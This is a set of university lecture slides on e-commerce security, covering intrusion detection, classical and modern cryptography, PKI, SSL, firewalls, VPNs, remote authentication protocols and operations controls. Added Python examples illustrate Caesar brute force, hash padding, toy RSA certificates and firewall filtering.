Kerberos (cont.)

Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson Prentice Hall

Page 70: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Intrusion Detection

• Network Based
  – Real Time, Passive
  – Snort
• Host Based
  – System and event logs
  – Limited by log capabilities
• Honey Pot
• System Integrity Verifier (SIV)
  – Tripwire

Page 71: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Intrusion Detection (cont.)

• Signature Based (Knowledge Based)
  – Signatures of an attack are stored and referenced
  – Failure to recognize slow attacks
  – Must have signature stored to identify
• Statistical Anomaly Based (Behavior Based)
  – IDS determines "normal" usage profile using statistical samples
  – Detects anomaly from the normal profile

Page 72: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Measures for compensating for both internal and external access violations

• Backups
• RAID – Redundant Array of Inexpensive Disks
• Fault Tolerance
• Business Continuity Planning
• Insurance

Page 73: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics

Page 74: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Transaction Security Issues

• Disclosure:
  – Release of message contents to any person not authorized to see them
• Traffic Analysis:
  – The discovery of the pattern of traffic between parties.
• Masquerade:
  – Insertion of messages into the network from a fraudulent source.
• Content modification:
  – Changes to the contents of a message, including insertion, deletion, transposition, or modification.


Page 75: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Transaction Security Issues (cont.)

• Sequence modification:
– Insertion, deletion, or reordering of sequenced packets by the intruder during transmission.

• Timing modification:
– Delay or replay of old message sequences that were recorded by the intruder in an earlier transaction.

• Repudiation:
– Denial of receipt of a message by the destination, or denial of transmission of a message by the source.

Page 76: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Encryption

The process of scrambling (encrypting) a message (plaintext) into ciphertext in such a way that it is difficult, expensive, or time-consuming for an unauthorized person to unscramble (decrypt) it

plaintext + encryption algorithm + key → ciphertext

Page 77: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Basic Terminology

• plaintext - original message
• ciphertext - coded message
• cipher - algorithm for transforming plaintext to ciphertext
• key - info used in cipher known only to sender/receiver
• encipher (encrypt) - converting plaintext to ciphertext
• decipher (decrypt) - recovering plaintext from ciphertext
• cryptography - study of encryption principles/methods
• cryptanalysis (codebreaking) - study of principles/methods of deciphering ciphertext without knowing key
• cryptology - field of both cryptography and cryptanalysis

Page 78: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Page 79: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Cryptography and Steganography

• Plaintext can be hidden in two ways:
– Steganography: conceal the existence of the message
– Cryptography: render the message unintelligible to outsiders using various kinds of transformation of the text

• Examples of Steganography
– Character marking: overwrite text with pencil
– Invisible ink: use special substance
– Pin punctures: pin puncture on selected letters

Page 80: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

How a Cryptosystem Works

Plaintext (M) (data file or messages)
  ↓ encryption algorithm (E) + secret key A (KA)
Ciphertext (C) (stored or transmitted safely)
  ↓ decryption algorithm (D) + secret key B (KB)
Plaintext (M) (original data or messages)

Note: Key A may be the same as Key B, depending on the algorithm

E(M) = C
D(C) = M
D(E(M)) = M

Page 81: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Brute Force Search

• always possible to simply try every key
• most basic attack, proportional to key size
• assume either know / recognise plaintext

Key Size (bits) | Number of Alternative Keys | Time required at 1 decryption/µs | Time required at 10^6 decryptions/µs
32 | 2^32 = 4.3 × 10^9 | 2^31 µs = 35.8 minutes | 2.15 milliseconds
56 | 2^56 = 7.2 × 10^16 | 2^55 µs = 1142 years | 10.01 hours
128 | 2^128 = 3.4 × 10^38 | 2^127 µs = 5.4 × 10^24 years | 5.4 × 10^18 years
168 | 2^168 = 3.7 × 10^50 | 2^167 µs = 5.9 × 10^36 years | 5.9 × 10^30 years
26 characters (permutation) | 26! = 4 × 10^26 | 2 × 10^26 µs = 6.4 × 10^12 years | 6.4 × 10^6 years

Page 82: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Caesar Cipher

• earliest known substitution cipher
• by Julius Caesar
• first attested use in military affairs
• replaces each letter by 3rd letter on
• example:

meet me after the toga party
PHHW PH DIWHU WKH WRJD SDUWB

Page 83: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Caesar Cipher (cipher wheel figure: K=3; outer ring: plaintext, inner ring: ciphertext)

Page 84: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Cryptanalysis of Caesar Cipher

• only have 26 possible ciphers – A maps to A, B, ..., Z
• could simply try each in turn
• a brute force search
• given ciphertext, just try all shifts of letters
• do need to recognize when have plaintext
• e.g. break ciphertext "GCUA VQ DTGCM"
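The brute-force cryptanalysis described above, as an added Python example (not from the slides): every one of the 26 shifts is tried and the candidate containing the most dictionary words wins. The word list is a constructed stand-in for a real dictionary or letter-frequency table.

```python
import string

ALPHABET = string.ascii_uppercase

# Tiny constructed dictionary used to "recognise plaintext"; real tools use
# letter-frequency statistics or a full word list.
COMMON_WORDS = {"THE", "TO", "ME", "MEET", "AFTER", "PARTY", "EASY", "BREAK", "AND", "IS"}


def caesar_encrypt(plaintext, key):
    """Shift each letter forward by `key` positions; non-letters pass through unchanged."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(ciphertext, key):
    """Decryption is encryption with the negated shift."""
    return caesar_encrypt(ciphertext, -key)


def english_score(text):
    """Count whitespace-separated tokens that are dictionary words."""
    return sum(1 for word in text.split() if word in COMMON_WORDS)


def brute_force(ciphertext):
    """Try all 26 keys (the whole key space) and return (key, plaintext) with the
    highest English score; ties go to the smaller key so the result is deterministic."""
    candidates = [(caesar_decrypt(ciphertext, k), k) for k in range(26)]
    best_plain, best_key = max(candidates, key=lambda c: (english_score(c[0]), -c[1]))
    return best_key, best_plain


if __name__ == "__main__":
    print(caesar_encrypt("meet me after the toga party", 3))  # PHHW PH DIWHU WKH WRJD SDUWB
    print(brute_force("GCUA VQ DTGCM"))                       # (2, 'EASY TO BREAK')
```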

Page 85: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Types of Cryptography

• Symmetric Cryptography
– Deploy the same secret key to encrypt and decrypt messages
– The secret key is shared between two parties
– Encryption algorithm is the same as decryption algorithm

• Asymmetric (Public-key) Cryptography
– Private key, Public key
– The secret key is not shared and two parties can still communicate using their public keys
– Encryption alg. is different from decryption alg.

Page 86: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Symmetric Cryptography

Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson Prentice Hall

Page 87: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Public-Key Cryptography

Ref: W. Stallings, Cryptography and Network Security, 4th Edition, Pearson Prentice Hall

Page 88: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Data Encryption Standard (DES)

• Derived in 1972 as a derivation of the Lucifer algorithm developed by Horst Feistel at IBM
• Commercial and non-classified systems
• DES uses a 64-bit block size and a 56-bit key; begins with a 64-bit key and strips 8 parity bits
• DEA is a 16-round cryptosystem designed for implementation in hardware
• 56-bit key = 2^56 or 70 quadrillion possible keys
• Distributed systems can break it. U.S. Government no longer uses it
• Triple DES – three encryptions using DEA are now being used until AES is adopted

Page 89: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

3DES

• Double encryption is subject to the meet-in-the-middle attack
• Encrypt on one end, decrypt on the other, and compare the values
• So Triple DES is used
• Can be done several different ways:
– DES-EDE2 (encrypt key 1, decrypt key 2, encrypt key 1)
– DES-EEE2 (encrypt key 1, encrypt key 2, encrypt key 1)
– DES-EEE3 (encrypt key 1, encrypt key 2, encrypt key 3) – most secure

Page 90: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

AES

• Advanced Encryption Standard
• Block Cipher that will replace DES
• Anticipated that Triple DES will remain approved for Government Use
• AES effort announced by NIST in January 1997 to find a replacement for DES
• October 2, 2000: NIST selected Rijndael
• 2 Belgian cryptographers, Dr. Daemen and Dr. Rijmen
• Will be used by government for sensitive but unclassified documents

Page 91: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

ITEC5611

S. Kungpisdan91

RSA

• Rivest, Shamir and Addleman• Based on difficulty of factoring a number which

is the product of two large prime numbers, may be 200 digits each.

• Can be used for Encryption, key exchange, and digital signatures

Page 92: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

ITEC5611

S. Kungpisdan92

Elliptic Curve Cryptography (ECC)

• Elliptic curve discrete logarithm are hard to compute than general discrete logarithm

• Smaller key size same level of security• Elliptic curve key of 160 bits = RSA of 1024 bits• Suited to smart cards and wireless devices (less

memory and processing)• Digital signatures, encryption and key

management

Page 93: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

ITEC5611

S. Kungpisdan93

Digital Signal Standard (DSS) and Secure Hash Standard (SHS)

• Enables use of RSA digital signature algorithm or DSA –Digital Signature Algorithm (based on El Gamal)

• Both use The Secure Hash Algorithm to compute message digest then processed by DSA to verify the signature. Message digest is used instead of the longer message because faster.

Page 94: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

ITEC5611

S. Kungpisdan94

MD5 and SHA-1

• MD5 Message Digest version 5– Developed by Ronald Rivest in 1991– Produces 128 bit message digest

• SHA-1– Secure Hash Algorithm produces 160 bit digest if

message is less than 2^64 bits.– It is computationally infeasible to find message from

message digest– It is computationally infeasible to find to different

messages with same message digest – Padding bits are added to message to make it a

multiple of 512
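As an added example (not part of the lecture), the padding rule stated for SHA-1, which MD5 shares, implemented explicitly, with hashlib confirming the 128- and 160-bit digest sizes; the 64-bit length field appended at the end is why the message must be shorter than 2^64 bits.

```python
import hashlib

BLOCK_BYTES = 64          # 512-bit compression-function block
LENGTH_FIELD_BYTES = 8    # 64-bit message length, hence the 2**64-bit limit


def md_pad(message: bytes, byteorder: str) -> bytes:
    """Merkle-Damgard padding: message || 0x80 || 0x00... || 64-bit bit-length,
    filled so the total is a multiple of 512 bits. MD5 writes the length
    little-endian, SHA-1 big-endian; that is the only difference."""
    bit_len = len(message) * 8
    if bit_len >= 1 << 64:
        raise ValueError("message length does not fit the 64-bit length field")
    padded = message + b"\x80"                       # the single mandatory 1 bit
    zeros = (-len(padded) - LENGTH_FIELD_BYTES) % BLOCK_BYTES
    padded += b"\x00" * zeros                        # reach 8 bytes short of a block edge
    return padded + bit_len.to_bytes(LENGTH_FIELD_BYTES, byteorder)


def sha1_pad(message: bytes) -> bytes:
    return md_pad(message, "big")


def md5_pad(message: bytes) -> bytes:
    return md_pad(message, "little")


def block_count(message: bytes) -> int:
    """How many 512-bit blocks the compression function will process."""
    return len(sha1_pad(message)) // BLOCK_BYTES


def digest_bits(algorithm: str) -> int:
    """Digest length in bits as reported by hashlib (md5 -> 128, sha1 -> 160)."""
    return hashlib.new(algorithm).digest_size * 8


if __name__ == "__main__":
    # A 55-byte message still fits one block (55 + 1 + 8 = 64); 56 bytes spills into two.
    print(block_count(b"a" * 55), block_count(b"a" * 56))   # 1 2
    print(sha1_pad(b"abc")[-8:].hex(), md5_pad(b"abc")[-8:].hex())
    print(digest_bits("md5"), digest_bits("sha1"))           # 128 160
```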

Page 95: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Digital Signatures

Page 96: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Public Key Certification Systems

• A source could post a public key under the name of another individual
• Digital certificates counter this attack; a certificate can bind individuals to their key
• A Certificate Authority (CA) acts as a notary to bind the key to the person
• CA must be cross-certified by another CA
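Added example, not from the slides, tying together the RSA, DSS and certificate slides: textbook RSA with toy four- and five-digit moduli, a message digest (SHA-256 here, an assumption; the slides name SHA) signed in place of the message, and a CA that signs (name, public key) bindings so that a key posted under someone else's name fails verification. The parties, primes and names are constructed, and raw modular exponentiation without padding is used only to show the mechanics.

```python
import hashlib
import json


def rsa_keygen(p, q, e=65537):
    """Return (public, private) = ((n, e), (n, d)) for distinct primes p, q.
    Assumes gcd(e, (p-1)(q-1)) == 1, true for every toy pair below."""
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse of e (Python 3.8+)
    return (n, e), (n, d)


def rsa_encrypt(m, public):
    n, e = public
    return pow(m, e, n)


def rsa_decrypt(c, private):
    n, d = private
    return pow(c, d, n)


def digest(data, n):
    """Message digest reduced mod n: what gets signed instead of the whole message."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data, private):
    n, d = private
    return pow(digest(data, n), d, n)


def verify(data, sig, public):
    n, e = public
    return pow(sig, e, n) == digest(data, n)


# The CA as notary: a certificate is (subject, public key) plus the CA's signature over it.
def issue_certificate(subject, subject_public, issuer_private):
    body = {"subject": subject, "n": subject_public[0], "e": subject_public[1]}
    encoded = json.dumps(body, sort_keys=True).encode()
    return {**body, "ca_sig": sign(encoded, issuer_private)}


def verify_certificate(cert, ca_public):
    body = {k: cert[k] for k in ("subject", "n", "e")}
    encoded = json.dumps(body, sort_keys=True).encode()
    return verify(encoded, cert["ca_sig"], ca_public)


def verify_signed_message(data, sig, claimed_subject, cert, ca_public):
    """Accept only if the certificate carries a valid CA signature, names the
    claimed subject, and the message signature checks under the certified key."""
    if not verify_certificate(cert, ca_public) or cert["subject"] != claimed_subject:
        return False
    return verify(data, sig, (cert["n"], cert["e"]))


# Constructed toy parties (primes far too small for real use).
CA_PUB, CA_PRIV = rsa_keygen(61, 53)               # n = 3233
ALICE_PUB, ALICE_PRIV = rsa_keygen(101, 113)       # n = 11413
MALLORY_PUB, MALLORY_PRIV = rsa_keygen(137, 131)   # n = 17947

ALICE_CERT = issue_certificate("alice", ALICE_PUB, CA_PRIV)
# Mallory publishes her own key under Alice's name; without the CA she can only
# self-sign the binding, which the CA's public key will not verify.
FORGED_CERT = issue_certificate("alice", MALLORY_PUB, MALLORY_PRIV)


def demo():
    msg = b"pay 100 to bob"
    genuine = verify_signed_message(msg, sign(msg, ALICE_PRIV), "alice", ALICE_CERT, CA_PUB)
    forged = verify_signed_message(msg, sign(msg, MALLORY_PRIV), "alice", FORGED_CERT, CA_PUB)
    tampered = verify_signed_message(b"pay 900 to bob", sign(msg, ALICE_PRIV),
                                     "alice", ALICE_CERT, CA_PUB)
    return genuine, forged, tampered   # (True, False, False)


if __name__ == "__main__":
    print(rsa_decrypt(rsa_encrypt(65, CA_PUB), CA_PRIV))   # 65
    print(demo())
```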

Page 97: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Public Key Infrastructure

• Digital Certificates
• Certificate Authorities (CA)
• Registration Authorities
• Policies and procedures
• Certificate Revocation
• Non-repudiation support
• Timestamping
• Lightweight Directory Access Protocol
• Security Enabled Applications
• Cross Certification

Page 98: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Key Escrow

• Allowing law enforcement to obtain the keys to view people's encrypted data
• Escrow the key in two pieces with two trusted escrow agents
• Court order to get both pieces
• Clipper Chip – implemented in tamper-proof hardware

Page 99: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Key Management

• Key control
• Key recovery
• Key storage
• Key retirement/destruction
• Key Change
• Key Generation
• Key theft
• Frequency of key use

Page 100: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

E-mail Security

• Non-repudiation

• Confidentiality of messages

• Authentication of Source

• Verification of delivery

Page 101: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Secure Multipurpose Internet Mail Extensions (S/MIME)

• Adds secure services to messages in MIME format

• Provides authentication through digital signatures

• Follows Public Key Cryptography Standards (PKCS)

• Uses X.509 Signatures

Page 102: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Pretty Good Privacy - PGP

• Phil Zimmermann
• Symmetric Cipher using IDEA
• RSA is used for signatures and key distribution
• No CA, uses “web of trust”
• Users can certify each other

Page 103: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Secure Sockets Layer (SSL)

• Developed by Netscape in 1994
• Uses public key to authenticate server to the client
• Also provides optional client-to-server authentication
• Supports RSA public key algorithms, IDEA, DES, and 3DES
• Supports MD5 hashing
• HTTPS header
• Resides between the application and TCP layer
• Can be used by telnet, FTP, HTTP and e-mail protocols.
• Based on X.509
• Transport Layer Security (TLS) is the successor to SSL

Page 104: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Outline

• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics

Page 105: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

OSI Security Services

• A security service is a collection of security mechanisms, files, and procedures that help protect the network.
– Authentication
– Access control
– Data confidentiality
– Data integrity
– Non-repudiation
– Logging and monitoring

Page 106: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

OSI Security Mechanisms

• A security mechanism is a control that is implemented in order to provide the 6 basic security services.
– Encipherment (encryption and decryption)
– Digital signature
– Access Control
– Data Integrity
– Authentication
– Traffic Padding
– Routing Control
– Notarization

Page 107: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Application Layer Security

• SET – Secure Electronic Transaction
– Originated by Visa and MasterCard
– Being overtaken by SSL

• HTTPS - Secure HTTP
– Early standard for encrypting HTTP messages
– Also being overtaken by SSL

• S/MIME – Secure Multipurpose Internet Mail Extension
– Email encryption and digital signature

Page 108: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Transport Layer Security

• SSH-2 – Secure Shell version 2
– SSH has RSA Certificates
– Supports authentication, compression, confidentiality, and integrity
– DES Encryption
– Because Secure Shell (SSH-2) supports authentication, compression, confidentiality, and integrity, SSH is used frequently for Encrypted File Transfer

• SSL – Secure Socket Layer
– Contains SSL record protocol and SSL Handshake Protocol
– Uses symmetric encryption and public key for authentication
– MAC – Message Authentication Code for Integrity

Page 109: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Firewalls

• Packet Filtering Firewall - First Generation
– Screening Router
– Operates at Network and Transport level
– Examines Source and Destination IP Address
– Can deny based on ACLs
– Can specify Port

• Application Level Firewall - Second Generation
– Proxy Server
– Copies each packet from one network to the other
– Masks the origin of the data
– Operates at layer 7 (Application Layer)
– Reduces network performance since it has to analyze each packet and decide what to do with it.
– Also Called Application Layer Gateway

Page 110: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Firewalls (cont.)

• Stateful Inspection Firewalls – Third Generation
– Packets Analyzed at all OSI layers
– Queued at the network level
– Faster than Application level Gateway

• Dynamic Packet Filtering Firewalls – Fourth Generation
– Allows modification of security rules
– Mostly used for UDP
– Remembers all of the UDP packets that have crossed the network’s perimeter, and it decides whether to enable packets to pass through the firewall.

• Kernel Proxy – Fifth Generation
– Runs in NT Kernel
– Uses dynamic and custom TCP/IP-based stacks to inspect the network packets and to enforce security policies.
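Added example (not from the slides) contrasting the first-generation ACL packet filter with stateful inspection from the two firewall slides: the stateless filter has no rule admitting return traffic and drops it, while the stateful one admits a reply only for a connection it has recorded. The addresses, ports and rules are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False  # TCP connection-open flag; the stateful filter records these


@dataclass(frozen=True)
class Rule:
    """One ACL entry: action plus source/destination network and optional destination port."""
    action: str                   # "allow" or "deny"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None   # None matches any destination port

    def matches(self, pkt: Packet) -> bool:
        return (
            ipaddress.ip_address(pkt.src) in ipaddress.ip_network(self.src)
            and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(self.dst)
            and (self.dport is None or self.dport == pkt.dport)
        )


def packet_filter(rules, pkt: Packet) -> str:
    """Screening router: first matching ACL entry wins; anything unmatched is denied."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return "deny"


class StatefulFirewall:
    """Applies the same ACL to new traffic but remembers permitted connection opens,
    so the matching replies are admitted without a standing inbound rule."""

    def __init__(self, rules):
        self.rules = rules
        self.established = set()  # (src, sport, dst, dport) of permitted opens

    def inspect(self, pkt: Packet) -> str:
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if reverse in self.established:
            return "allow"        # reply to a connection we let out
        if packet_filter(self.rules, pkt) == "allow":
            if pkt.syn:
                self.established.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "allow"
        return "deny"


# Constructed policy: 192.168.1.0/24 is the internal LAN, 203.0.113.10 a DMZ web server.
RULES = [
    Rule("allow", src="192.168.1.0/24", dport=443),       # internal clients may reach HTTPS
    Rule("allow", dst="203.0.113.10/32", dport=80),        # anyone may reach the DMZ web server
    Rule("deny", dst="192.168.1.0/24"),                    # nothing else reaches the inside
]

# Constructed packets, in the order they arrive at the firewall.
SCENARIO = [
    ("outbound https open", Packet("192.168.1.5", 51000, "198.51.100.7", 443, syn=True)),
    ("reply to that connection", Packet("198.51.100.7", 443, "192.168.1.5", 51000)),
    ("unsolicited inbound", Packet("198.51.100.9", 443, "192.168.1.5", 51000)),
    ("inbound to DMZ web", Packet("198.51.100.9", 40000, "203.0.113.10", 80)),
]


def run_scenario():
    """Return {label: (stateless decision, stateful decision)} for the scenario."""
    fw = StatefulFirewall(RULES)
    return {label: (packet_filter(RULES, pkt), fw.inspect(pkt)) for label, pkt in SCENARIO}


if __name__ == "__main__":
    for label, (stateless, stateful) in run_scenario().items():
        print(f"{label:28s} packet filter: {stateless:5s} stateful: {stateful}")
```

A stateless filter can only pass the reply by adding a broad rule for inbound traffic from port 443, which is exactly the hole the unsolicited packet would slip through.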

Page 111: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Demilitarized Zone (DMZ)

Page 112: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Virtual Private Networks

• PPTP – Point-to-Point Tunneling Protocol
– Works at the Data Link Layer
– Single point-to-point connection from client to server
– Common with asynchronous connections with NT and Win 95

• L2TP - Layer 2 Tunneling Protocol
– Combination of PPTP and earlier Layer 2 Forwarding Protocol (L2F)
– Multiple protocols can be encapsulated within the L2TP
– Single point-to-point connection from client to server
– Common with Dial-up VPNs

• IPSec
– Operates at the network layer
– Allows multiple and simultaneous tunnels
– Encrypt and authenticate IP data
– Focuses more on Network to Network Connectivity

Page 113: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Wireless Security

• WEP – Wired Equivalent Privacy – up to 128-bit WEP
• WPA (Wi-Fi Protected Access) is more secure; more recently WPA2
• WAP - Wireless Access Point
• SSID – Service Set Identifier – Network Name
– Disable SSID broadcast
• Use encryption, VPN, treat as external connection, directional antenna

Page 114: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Remote Node Security Protocols

• Password Authentication Protocol (PAP)
– Remote security protocol. Provides Identification and Authentication.
– Uses a static, replayable password for authentication (now considered weak)
– Does not encrypt the User ID or Password

• Challenge Handshake Authentication Protocol (CHAP)
– Next evolution of PAP; uses stronger authentication
– Non-replayable Challenge/Response
– Verifies Identity of the node
– Often used to enable network-to-network communication
– Commonly used by remote access servers and xDSL, ISDN, and cable modems

Page 115: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Remote Access Authentication System

• TACACS – Terminal Access Controller Access Control System (TCP)
• TACACS+ – includes the use of two-factor authentication
• RADIUS – Remote Authentication Dial-In User Service (UDP)

Page 116: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

TACACS

• Terminal Access Controller Access Control System
• Provides remote authentication and related services
• User password administered in a central database rather than in individual routers
• TACACS-enabled network device prompts for user name and static password
• TACACS-enabled network device queries the TACACS server to verify the password
• Does not support prompting for password change or use of dynamic tokens

Page 117: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

TACACS+

• Terminal Access Controller Access Control System Plus
• Proprietary CISCO enhancement
• Two-factor Authentication
• User can change password
• Ability to use secure tokens
• Better Audit Trails

Page 118: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

RADIUS

• Remote Authentication Dial-In User Service
• Offers similar benefits to TACACS+
• Often used as a stepping stone to TACACS+
• RADIUS server contains dynamic password and network service access information (network ACLs)
• RADIUS is a fully open protocol, can be customized for almost any security system
• Can be used with Kerberos and provides CHAP remote node authentication
• Except does not work with:
– AppleTalk Remote Access Protocol (ARAP)
– NetBIOS Frame Protocol Control Protocol
– NetWare Asynchronous Services Interface
– X.25 PAD Connection

Page 119: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Honeypots

• Production systems (e.g., firewalls, routers, Web servers, database servers) designed to do real work but that are watched and studied as network intrusions occur

Page 120: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Layered Security

Page 121: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Outline

• EC Architectural Framework
• EC Security
– Basic Security Issues
– Security Incidences
– Attacking Web Applications
– Access Controls
– Securing EC Communications
– Securing EC Networks
– Operations Security
– Law, Investigation, and Ethics

Page 122: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Asset, Vulnerability, Threat

• Asset – anything that is a computer resource (e.g. software, data)
• Vulnerability – weakness in a system that enables security to be violated (e.g. weak segregation of duties)
• Threat – an event that could cause harm by violating the security (e.g. operator abuse of privileges)

Page 123: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

CIA

• Confidentiality – operations controls affect confidentiality of data.

• Integrity – how well operations controls are implemented affects data integrity

• Availability – fault tolerance and ability to recover

Page 124: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Controls and Protections

• Controls to protect hardware, software and media from:
– Threats in an operating environment
– Internal and external intruders
– Operators inappropriately accessing resources

Page 125: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

ITEC5611

S. Kungpisdan125

Categories of Controls

• Preventative – prevent harmful occurrence– Lower amount and impact of errors entering the

system– Prevent unauthorized intruders from accessing the

system

• Detective – detect after harmful occurrence– Track unauthorized transactions

• Corrective – restore after harmful occurrence– Data recovery

Page 126: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Separation of Duties

• Assign different tasks to different personnel
• No single person can completely compromise a system
• Related to the concept of least privilege – the least privileges required to do one’s job
• Secure Systems - System Administrator and Security Administrator must be different roles.
• Highly Secure Systems - System Administrator, Security Administrator, and Enhanced Operator must be different roles.

Page 127: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

System Administrator Functions

• Installing software
• Start up and shut down of system
• Adding/removing users
• Performing back up and recovery
• Handling printers and queues

Page 128: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Security Administrator Functions

• Setting user clearances, initial passwords and other security characteristics for new users
• Changing security profiles for users
• Setting file sensitivity labels
• Setting security of devices
• Reviewing audit data

Page 129: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Least Privilege

• No access beyond job requirements
• Group level privileges for Operators
– Read Only
– Read/Write - usually copies of original data
– Access Change – make changes to original data

Page 130: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Operation Controls

• Resource Protection

• Hardware Controls

• Software Controls

Page 131: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Resource Protection

• Protecting resources from disclosure, alteration or misuse
– Hardware – routers, firewalls, computers, printers
– Software – libraries, vendor software, OS software
– Data Resource – backup data, user data, logs

Page 132: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Hardware Controls

• Hardware Maintenance
– Requires physical and logical access by support and vendors
– Supervision of vendors and maintenance, background checks

• Maintenance Accounts
– Disable maintenance accounts when not needed
– Change default passwords

• Diagnostic Port Control
– Specific ports for maintenance
– Should be blocked from external access

• Hardware Physical Controls – require locks and alarms
– Sensitive operator terminals
– Media storage rooms
– Server and communications equipment
– Modem pools and circuit rooms

Page 133: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Software Controls

• Anti-virus Management – prevent download of viruses
• Software Testing – formal, rigid software testing process
• Software Utilities – control of powerful utilities
• Safe Software Storage – prevent modification of software and copies of backups
• Backup Controls – test and restore backups

Page 134: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Physical Protection

• Protection from physical access
– Hardware – routers, firewalls, computers, printers
– Software – libraries, vendor software, OS software

• Physical piggybacking – following an authorized person through a door

Page 135: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Monitoring and Audits

• Monitoring – problem identification and resolution
• Monitor for:
– Illegal Software Installation
– Hardware Faults
– Error States
– Operational Events

Page 136: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Penetration Testing

• Testing a network's defenses by using the same techniques as external intruders
– Scanning and Probing – port scanners
– Demon Dialing – war dialing for modems
– Sniffing – capture data packets
– Dumpster Diving – searching paper disposal areas
– Social Engineering – most common, get information by asking

Page 137: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Auditing

• IT Auditors Audit:
– Backup Controls
– System and Transaction Controls
– Data Library Controls
– Systems Development Standards
– Data Center Security
– Contingency Plans

Page 138: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Audit Trails

